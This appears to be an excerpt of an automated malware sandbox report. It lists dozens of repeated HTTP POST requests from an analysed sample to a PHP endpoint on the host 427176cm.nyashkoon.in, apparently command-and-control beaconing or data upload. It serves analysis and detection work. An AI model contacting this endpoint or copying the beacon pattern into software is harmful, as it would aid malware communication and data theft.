                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1024Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1300Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1288Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1276Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continue
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1028Expect: 100-continueConnection: Keep-Alive
                                    Source: global trafficHTTP traffic detected: POST /providerlinerequestpollSecureHttppublictempcentral.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0Host: 427176cm.nyashkoon.inContent-Length: 1032Expect: 100-continueConnection: Keep-Alive
